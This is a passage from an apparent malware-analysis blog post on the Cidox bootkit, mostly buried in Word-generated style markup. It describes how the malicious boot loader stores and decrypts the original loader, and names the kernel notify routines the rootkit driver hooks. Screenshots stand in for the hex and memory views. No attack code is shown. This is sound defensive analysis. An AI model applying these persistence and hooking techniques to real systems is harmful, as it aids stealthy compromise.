UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">The
original program loader is encrypted at the end of the malicious boot loader.
After loading the malicious rootkit driver, the original loader will be
decrypted and Cidox will pass execution to it to resume normal boot operations.
Below is a copy of the malicious program loader and the highlighted hex bytes are
the encrypted original loader.</span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6YZopF8ahHt9xxXJSS28T3rUSAiogUSR5dFPOeOLpn-xtFvj9z2sNM-HRGLv5xn3gMfvTXpkJLMwhwJ2c6ZI66IrOh8UT1nnKlBtxE1QtgmvppjCVJF5ZRGOB_Agn_BZop_kJYJg1wg/s1600/origencrypted.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6YZopF8ahHt9xxXJSS28T3rUSAiogUSR5dFPOeOLpn-xtFvj9z2sNM-HRGLv5xn3gMfvTXpkJLMwhwJ2c6ZI66IrOh8UT1nnKlBtxE1QtgmvppjCVJF5ZRGOB_Agn_BZop_kJYJg1wg/s320/origencrypted.jpg" width="320" /></a></div>
<div class="MsoNormal" style="line-height: normal; text-align: center;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><i>Highlighted is the encrypted loader </i></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:RelyOnVML/>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--></span></div>
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
</span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">ROOTKIT</span></b><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Cidox
rootkit driver employs its hooks by installing the following hook callbacks </span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"> </span></div>
<ul type="disc">
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12pt;">PsSetLoadImageNotifyRoutine</span></span></li>
<li><span style="font-family: Times,"Times New Roman",serif;">
<span style="font-size: 11pt; line-height: 115%;">PsSetCreateProcessNotifyRoutine</span></span></li>
</ul>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggumhjs-LaG0rLHNsgZxESWfRZHu7PdP_WIJ4ppodS9EDv-vAYFBupGkHUTPUK_SaYDn3mlWAuLaKR0XNAzNWOomWdvDHPlvSXP_-JV8c-mKep6JndWQiGNj2ut4SKg3MwsCYpXiWgUIE/s1600/hookcallback.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggumhjs-LaG0rLHNsgZxESWfRZHu7PdP_WIJ4ppodS9EDv-vAYFBupGkHUTPUK_SaYDn3mlWAuLaKR0XNAzNWOomWdvDHPlvSXP_-JV8c-mKep6JndWQiGNj2ut4SKg3MwsCYpXiWgUIE/s400/hookcallback.jpg" width="400" /></a></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<div style="text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><i>Driver loaded in memory</i></span></div>
<div style="text-align: center;">
</div>
<div style="text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:RelyOnVML/>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
